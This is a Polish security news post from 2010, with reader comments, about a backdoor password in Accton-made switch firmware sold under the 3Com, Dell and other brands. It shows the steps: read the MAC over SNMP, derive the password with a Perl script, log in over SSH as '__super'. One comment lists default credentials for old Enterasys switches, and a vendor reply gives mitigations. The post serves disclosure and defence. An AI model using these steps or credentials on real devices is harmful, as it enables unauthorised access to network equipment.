21:14
2/9/2010

Uwaga posiadacze zarządzalnych switchy marek takich firm jak 3Com, Dell i kilku innych bazujących na firmwarze firmy Acceton. Do tych przełączników można wygenerować specjalne, “tajne” hasło dostępowe — wystarczy znajomość adresu MAC switcha.

Switch 3Com i Dell –> Switch Accton

Backdoor dający dostęp do switcha znajduje się w oprogramowaniu firmy Accton. Firma ta produkuje switche, które są później pakowane w różne obudowy i sprzedawane (po różnych cenach) pod takimi markami jak:

    3Com (np. modele: 3812, 3870),
    Dell (PowerConnect 5224),
    SMC,
    Foundry
    EdgeCore.

Pańskie hasło to...

Backdoor password: odzyskiwanie hasła administratora

Aby wyliczyć hasło, które da nam dostęp do panelu sterowania switchem, wystarczy odczytać adres MAC switcha (np. poprzez zapytanie ARP lub SNMP) a następnie wprowadzić go do tego skryptu …i zalogować się do switcha z loginem __super:

$ snmpget -v1 -c public 192.168.104.99 IF-MIB::ifPhysAddress.1001
IF-MIB::ifPhysAddress.1001 = STRING: 0:d:54:9d:1b:90

$ perl accton.pl 0:d:54:9d:1b:90
!F!RELUO

$ ssh __super@192.168.104.99
__super@192.168.104.99's password: !F!RELUO

Menu options: --3Com SuperStack 3 Switch 3812 12-port--
[...]

Type ? for help.

O backdorze wiadomo od ponad roku, jednak producen(t|ci) switchy nie wydali do tej pory żadnej poprawki. Odkrywcy backdoora wpadli na jego ślad robiąc reverse-engineering firmware’u

Ciekawe ile jeszcze switchy i routerów ma kryje w sobie podobne niespodzianki?

Przeczytaj także:



21 komentarzy

Dodaj komentarz
  1. Na zdjęciu przełącznik Cisco :) W IOS nie ma backdoora .. przynajmniej tego :)

    • cbr: nie, to nie Cisco.

    • przepraszam bardzo co ma iOS do switcha? :D

    • Olo: iOS to nazwa systemu Apple, IOS (Internetwork Operating System) to system operacyjny Cisco. Mają umowę o wzajemne wykorzystywanie (!) podobnej nazwy – po prostu doszli do porozumienia. Co ciekawe, oba systemy są bazowane na BSD :)

  2. Jak nie jak tak, przecież to 3750. TinEye potwierdza: http://www.torent.ro/imagini/mari/64818/674d16e225c398.jpg

    • Oszukali mnie, banda decydentów! (BTW: 3com.com tez was na HP przerzuca? :>)

  3. HP kupił 3com :)

  4. “ile jeszcze switchy i routerów ma kryje w sobie” – to ma czy kryje? :)

  5. “Ciekawe ile jeszcze switchy i routerów ma kryje w sobie podobne niespodzianki?”
    Myślę,że warto przedstawić na łamach niebezpiecznika metodę z trybem i stroną debugowania w wielu routerach.
    Przykład: hxxp://www.icysilence.org/?p=268 , hxxp://www.icysilence.org/?p=413
    Szkoda,że ogólnie nie ma bardzo do wglądu prac Cristofaro Mune,który na tegorocznym CONFidence dawał popis i prezentował właśnie tę metodę i nietylko podczas wykładu o ‘zbyt licznych AP-kach’
    To była jedna z wielu prelekcji,która szczególnie pozytywnie zapadła mi w pamięci i myślę,ze warto skontaktować się z Cristofaro w celu wystąpienia z prośbą o udostępnienie jakichś materiałów albo udzielenia małego wywiadu na rzecz niebezpiecznika,ponieważ jest on jak najbardziej wartym uwagi specem.
    Co redakcja na ten temat sądzi?

  6. “Acceton” w drugim wierszu :)

  7. No i powiedzcie mi, że ‘teoria spiskowa’ mówiąca o tym, że Chińczycy wrzucają backdoory do produkowanego przez siebie sprzętu telekomunikacyjnego jest nadal szalona…
    Większość elektroniki produkują w tym zagłębiu ryżowym od lat… Kto wie co oni tam ‘od siebie’ dorzucają ? :)

  8. Kolejny powód, dla którego snmp należałoby wszędzie blokować.

  9. Nie wiem czy obecne ale stare switch’e etrasys’a też miały backdora.
    L: tiger
    P: tiger123

  10. A na moim 5500G-EI nie działa.

  11. Na 3Com 3870 u mnie ten sposób nie działa:
    Login: __super
    Password:
    Incorrect Password.

    Sprawdzałem także na 4200G oraz 4228G – reakcja j/w.

  12. Firma EdgeCore żwawo odpowiedziała na problem:

    The solution we have for this issue is to let this passwd could only work on console session only, None of the telnet sessions could use this passwd.
    Besides, we had modified the passwd alogrithm to make it harder to be hacked.
    ES3528MO is in the process of a ECN and I will stop it to include this code fix. In the meantime, the patch image for this passwd fix will be available soon(end of september) for ES3528MO.

    Before the runtime formal release,our boss Ck have some workaround as below.

    Here the reply from our boss,Ck in the forum.

    Anyway I think if customer use the switch properly, it wonĄŻt be attacked by the super password issue.

    Firstly, normally customer will separate the user vlan from management vlan, so user can reach the switch.

    Secondary, even if user and switch in the same vlan (subnet), or the management vlan can be accessed by routing, we still have a way to prevent switch from attack,

    by using the command showing below, only specified management IP can access the switch.

    Console#config
    Console(config)#management ?
    all-client Adds IP addresses to SNMP, Web and Telnet groups
    http-client Adds IP addresses to the Web group
    snmp-client Adds IP addresses to the SNMP group
    telnet-client Adds IP addresses to the Telnet group
    Console(config)#management all-client ?
    A.B.C.D Starts IP address
    Console(config)#management all-client 192.168.1.1 ?
    A.B.C.D Ends IP address

    Console(config)#management all-client 192.168.1.1 192.168.1.10

    only IP address within 192.168.1.1-10 can access the switch via telnet, http, snmp or all

    using this way, user also cant get mac of the switch via SNMP

    Please comment if it address your connern. Thanks.

    Please also dont forget to change the default username and password

    Console(config)#no username guest
    Console(config)#no username admin
    Console(config)#username ck_ng password 0 Support
    Console(config)#enable password level 15 0 Support

  13. Na Edge-Coreowe switche (a Edge-Core to marka Acctona) jakoś nie chce to zadziałać.

  14. […] I tu należałoby wspomnieć o tym, że backdoory bardzo często umieszczane są w oprogramowaniu przez samego twórcę (zgodnie z założeniem: “it’s a feature not bug”) a nie producenta na taśmie […]

  15. […] Jako pierwsi sprawę nagłośnili użytkownicy serwisu reddit.com, którzy celnie spostrzegli, że nie TP-Link pierwszy i zapewne nie ostatni… Czytelnicy Niebezpiecznika powinni pamiętać niedawną wpadkę dotyczącą loadbalancerów F5 oraz backdoory w switchach firm 3Com, Dell oraz innych. […]

  16. To równie dobrze można powiedzieć, że jest back-door do procesora serwisowego w serwerach pSeries opartych o procesory Power. Do wyliczenia hasła wystarczy numer seryjny maszyny. Ale oprogramowanie do tego mają tylko inżynierowie IBM. Jest backdoor?

Twój komentarz

Zamieszczając komentarz akceptujesz regulamin dodawania komentarzy. Przez moderację nie przejdą: wycieczki osobiste, komentarze nie na temat, wulgaryzmy.

RSS dla komentarzy: